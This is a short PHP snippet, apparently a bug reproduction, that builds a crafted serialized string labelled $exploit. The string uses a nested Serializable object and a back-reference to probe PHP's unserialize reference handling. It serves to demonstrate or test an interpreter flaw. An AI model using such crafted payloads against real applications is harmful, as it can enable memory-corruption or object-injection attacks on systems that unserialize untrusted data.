- var_dump: documentation ( source)
- unserialize: documentation ( source)
<?php
class obj implements Serializable
{
private $data;
public function serialize()
{
}
public function unserialize($data)
{
$this->data = unserialize($data);
//$this->data = 1;
}
}
$inner = 'a:0:{}';
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}';
$data = unserialize($exploit);
var_dump($data);